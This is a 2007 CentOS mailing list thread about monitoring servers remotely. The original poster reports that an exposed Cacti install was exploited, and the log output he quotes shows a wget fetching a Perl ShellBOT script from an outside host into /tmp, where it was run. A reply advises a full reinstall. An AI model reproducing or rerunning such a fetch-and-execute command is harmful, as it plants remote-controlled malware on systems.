[CentOS] Re: Suggested way to remotely monitor servers and networks these days?

Thu May 24 17:09:27 UTC 2007
Dexter Ang <thepoch at gmail.com>

On 5/24/07, Tom Diehl <tdiehl at rogueind.com> wrote:
>
> On Thu, 24 May 2007, Dexter Ang wrote:
>
> > Hi folks,
> >
> > I'm just wondering what is the recommended way of monitoring servers and
> > networks remotely. <snip>
>
> You might want to look at hobbit.
> http://sourceforge.net/projects/hobbitmon/
>
> I find it much easier to manage than nagios. Besides the UI looks nicer.
> :-)


Thanks! I'll look into this.

>
> > The problem is that leaving cacti open was the most stupid thing I've
> done.
> > After checking /var/log/httpd/error_log, I saw that someone exploited a
> > cacti php file and the result was:
> >
> > --08:13:11--  http://psaico.host.sk/desk.pl
> >          => `/tmp/desk.pl'
> > Resolving psaico.host.sk... 62.168.109.150
> > Connecting to psaico.host.sk|62.168.109.150|:80... connected.
> > HTTP request sent, awaiting response... 200 OK
> > Length: 20,144 (20K) [text/x-perl]
> >
> >   0K .......... .........                                  100%
> 28.26KB/s
> >
> > 08:13:13 (28.26 KB/s) - `/tmp/desk.pl' saved [20144/20144]
> >
> > which immediately downloaded ShellBOT to /tmp and executed it. It was a
> good
> > thing I caught this as early as I did. So, what's everyone elses
> solution
> > these days? Or is it simply a matter of creating a /tmp partition and
> > mounting it noexec?
> >
> > On a side note... anyone with experience with ShellBOT? From research,
> it
> > seems to attempt to connect to an IRC server upon running. So if my
> outgoing
> > connections are secured by iptables, can I assume it never got connected
> at
> > all? I'll probably try this out someday but just looking for a quick
> > experienced answer.
>
> It does not matter if they connected or not. The bottom line the machine
> was
> hacked and someting got installed that does not belong there. There is no
> way
> at this point to be sure that they did not install something else or
> modify
> binaries to hide their tracks.
>
> So now the only to be sure there is not something in that machine is to
> reload
> it. Anything less and you will never know for sure.


Wise words. This will definitely be my next step ASAP.

dex
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.centos.org/pipermail/centos/attachments/20070525/f2a6935a/attachment-0004.html>